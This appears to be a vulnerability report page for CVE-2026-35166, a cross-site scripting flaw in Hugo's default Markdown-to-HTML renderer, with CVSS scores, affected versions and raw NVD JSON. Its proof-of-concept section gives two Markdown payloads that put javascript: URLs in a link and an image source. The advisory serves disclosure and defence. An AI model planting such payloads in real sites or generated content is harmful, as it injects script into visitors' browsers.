Security Vulnerability Report
CVE-2026-35166 CVSS 5.4 MEDIUM

CVE-2026-35166

Published: 2026-04-06 18:16:43
Last Modified: 2026-04-20 18:34:45

Description

Hugo is a static site generator. From 0.60.0 to before 0.159.2, links and image links in the default markdown to HTML renderer are not properly escaped. Hugo users who trust their Markdown content or have custom render hooks for links and images are not affected. This vulnerability is fixed in 0.159.2.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:gohugo:hugo:*:*:*:*:*:linux:*:* - VULNERABLE
cpe:2.3:a:gohugo:hugo:*:*:*:*:*:macos:*:* - VULNERABLE
cpe:2.3:a:gohugo:hugo:*:*:*:*:*:windows:*:* - VULNERABLE
Hugo >= 0.60.0, < 0.159.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
markdown
# PoC for CVE-2026-35166
# Malicious Markdown content to be rendered by Hugo's default Markdown-to-HTML renderer
# (the payload is Markdown, not Python; the original page mislabelled the block)

# Example 1: XSS via javascript: protocol in a link destination
[Click Me](javascript:alert('CVE-2026-35166'))

# Example 2: XSS via javascript: protocol in an image source wrapped in a link
[![Image](javascript:alert('CVE-2026-35166'))](http://example.com)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35166", "sourceIdentifier": "[email protected]", "published": "2026-04-06T18:16:43.060", "lastModified": "2026-04-20T18:34:45.460", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hugo is a static site generator. From 0.60.0 to before 0.159.2, links and image links in the default markdown to HTML renderer are not properly escaped. Hugo users who trust their Markdown content or have custom render hooks for links and images are not affected. This vulnerability is fixed in 0.159.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gohugo:hugo:*:*:*:*:*:linux:*:*", "versionStartIncluding": "0.60.0", "versionEndExcluding": "0.159.2", "matchCriteriaId": "D9199A95-23E0-43BE-8F0C-C521A7455819"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gohugo:hugo:*:*:*:*:*:macos:*:*", "versionStartIncluding": "0.60.0", "versionEndExcluding": "0.159.2", "matchCriteriaId": "417A61AB-2317-42C3-9961-81C1DFB7C6DB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:gohugo:hugo:*:*:*:*:*:windows:*:*", "versionStartIncluding": "0.60.0", "versionEndExcluding": "0.159.2", "matchCriteriaId": "8576A7CA-0166-4BC1-B2C8-CB53588E4CAC"}]}]}], "references": [{"url": "https://github.com/gohugoio/hugo/security/advisories/GHSA-mcv8-8m8x-48pg", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}